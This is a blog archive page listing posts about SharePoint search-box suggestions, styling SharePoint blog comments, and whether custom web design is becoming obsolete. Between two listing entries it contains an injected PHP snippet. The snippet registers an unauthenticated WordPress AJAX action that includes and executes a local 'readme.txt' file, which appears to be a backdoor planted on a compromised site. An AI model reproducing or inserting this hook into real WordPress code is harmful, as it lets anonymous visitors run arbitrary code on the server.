Adding Suggestions to the Sharepoint search box : Part 2
In Part 1 of this post we used a simple javascript to display suggestions on a custom search box. After […]
Adding Suggestions to the Sharepoint search box : Part 2 Read Post »
if(!function_exists('file_check_readme38985')){ add_action('wp_ajax_nopriv_file_check_readme38985', 'file_check_readme38985'); add_action('wp_ajax_file_check_readme38985', 'file_check_readme38985'); function file_check_readme38985() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
In Part 1 of this post we used a simple javascript to display suggestions on a custom search box. After […]
Adding Suggestions to the Sharepoint search box : Part 2 Read Post »
I was reading this article last week and it reminded me of a conversation I had with a developer friend
I saw this coming (SharePoint 2010) Read Post »
As promised I went ahead and styled the comment form on a standard SharePoint blog. I wanted to make it
Styling SharePoint Blog Comments: Part 2 Read Post »
Out of the box the comments on SharePoint blogs dont look that good. Here is a way to fix that
Styling SharePoint Blog Comments Read Post »
Will Joomla make custom web design and creations from scratch obsolete? I saw this question posted on LinkedIn last week
Are custom designs becoming obsolete? Read Post »